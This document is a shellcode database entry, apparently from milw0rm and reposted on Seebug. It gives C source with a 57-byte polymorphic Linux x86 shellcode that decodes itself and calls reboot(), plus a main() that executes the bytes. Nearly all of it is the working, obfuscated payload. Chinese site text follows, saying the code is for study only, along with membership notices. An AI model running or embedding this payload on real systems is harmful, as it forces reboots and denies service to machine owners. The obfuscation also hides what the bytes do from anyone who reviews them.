/* * Title : reboot() polymorphic shellcode - 57 bytes * Os: Linux x86 * * Author: Jonathan Salwan - submit AT shell-storm.org * Web: http://www.shell-storm.org * * * !! Database of shellcodes => http://www.shell-storm.org/shellcode/ * */ #include <stdio.h> char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x30\x80" "\x6c\x0e\xff\x01\x80\xe9\x01\x75" "\xf6\xeb\x05\xe8\xea\xff\xff\xff" "\x32\xc1\x51\x69\x63\x70\x70\x75" "\x69\x6f\x30\x73\x66\x69\x30\x74" "\x63\x6a\x8a\xe4\x51\x8a\xe3\x54" "\x8a\xe3\x54\x8a\xe2\xb1\x0c\xce" "\x81"; int main() { fprintf(stdout,"Length: %d\n",strlen(shellcode)); (*(void(*)()) shellcode)(); return 0; } // milw0rm.com [2009-06-29]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论